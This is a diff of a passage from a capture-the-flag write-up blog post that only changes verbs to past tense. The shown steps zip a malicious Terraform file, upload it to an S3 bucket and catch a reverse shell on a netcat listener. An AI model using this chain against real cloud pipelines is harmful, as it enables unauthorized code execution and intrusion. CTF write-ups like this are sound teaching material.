rizemon/rizemon.github.io/_posts/2023-10-05-tisc-level7b.markdown

 With the malicious Terraform file created, the next step would be to upload it as `rawr.zip` to the `devsecmeow2023zip` bucket.
 Fortunately, the current account has `PutObject` permissions to the `devsecmeow2023zip` bucket.

-The `pwn.tf` is zipped up as `rawr.zip` like so:
+The `pwn.tf` was zipped up as `rawr.zip` like so:

 ```bash
 $ zip rawr.zip pwn.tf
   adding: pwn.tf (deflated 8%)
 ```

-And the `rawr.zip` is uploaded to the `devsecmeow2023zip` bucket:
+And the `rawr.zip` was uploaded to the `devsecmeow2023zip` bucket:

 ```bash
 $ aws s3 cp ./rawr.zip s3://devsecmeow2023zip/rawr.zip
 upload: ./rawr.zip to s3://devsecmeow2023zip/rawr.zip
 ```

-After a while, a reverse shell connection is caught on the listener:
+After a while, a reverse shell connection was caught on the listener:

 ```bash
 $ nc -lvnp 1337